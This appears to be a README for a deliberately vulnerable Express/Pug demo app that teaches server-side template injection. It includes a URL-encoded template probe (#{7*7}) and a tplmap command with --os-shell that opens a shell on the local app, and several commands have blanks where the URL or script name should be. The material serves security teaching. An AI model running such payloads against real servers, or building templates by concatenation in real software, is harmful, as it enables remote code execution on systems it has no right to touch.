This application is a demonstration prototype just to show how to perform SSTI (Server side templating injection) attack. This application use Express and Pug as templating engine. This tutorial is based on
Install nodejs
Install dependencies
$ npm install
- Install tplmap
$ git clone
$ cd tplmap
$ virtualenv --python=/usr/bin/python2.7 venv
$ source ./venv/bin/activate
$ pip install -r requirements.txt
- Start application
$ node app.js
Open http://localhost:3000/?name=%23%7B7*7%7D to test if your application is expose to SSTI (name=#{7*7})
Run SSTI attack with tplmap
(venv)$ ./ --engine pug --os-shell -u http://localhost:3000/?name=bob
In this example, the template is built by concatenation instead of using interpolation in order to escape data